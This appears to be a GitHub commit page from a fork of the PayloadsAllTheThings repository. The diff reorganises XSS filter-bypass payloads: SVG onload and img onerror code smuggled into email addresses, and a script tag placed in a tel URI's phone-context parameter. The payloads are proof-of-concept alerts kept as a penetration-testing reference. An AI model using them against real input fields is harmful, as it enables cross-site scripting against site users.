forked from swisskyrepo/PayloadsAllTheThings
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
6d3fef0
commit 2e73069
Showing
1 changed file
with
18 additions
and
6 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
|
|
@@ -775,20 +775,32 @@ $ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd | |
| 00000010: 6572 7428 3129 0c3e 0a ert(1).>. | ||
| ``` | ||
| ### Bypass email filter | ||
| ([RFC compliant](http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate)) | ||
| * [RFC0822 compliant](http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate) | ||
| ```javascript | ||
| "><svg/onload=confirm(1)>"@x.y | ||
| ``` | ||
| * [RFC5322 compliant](https://0dave.ch/posts/rfc5322-fun/) | ||
| ```javascript | ||
| [email protected](<img src='x' onerror='alert(document.location)'>) | ||
| ``` | ||
| ```javascript | ||
| "><svg/onload=confirm(1)>"@x.y | ||
| ``` | ||
| ([RFC5322 compliant](https://0dave.ch/posts/rfc5322-fun/)) | ||
| ### Bypass tel URI filter | ||
| At least 2 RFC mention the `;phone-context=` descriptor: | ||
| * [RFC3966 - The tel URI for Telephone Numbers](https://www.ietf.org/rfc/rfc3966.txt) | ||
| * [RFC2806 - URLs for Telephone Calls](https://www.ietf.org/rfc/rfc2806.txt) | ||
| ```javascript | ||
| [email protected](<img src='x' onerror='alert(document.location)'>) | ||
| +330011223344;phone-context=<script>alert(0)</script> | ||
| ``` | ||
| ### Bypass document blacklist | ||
| ```javascript | ||
|
|
||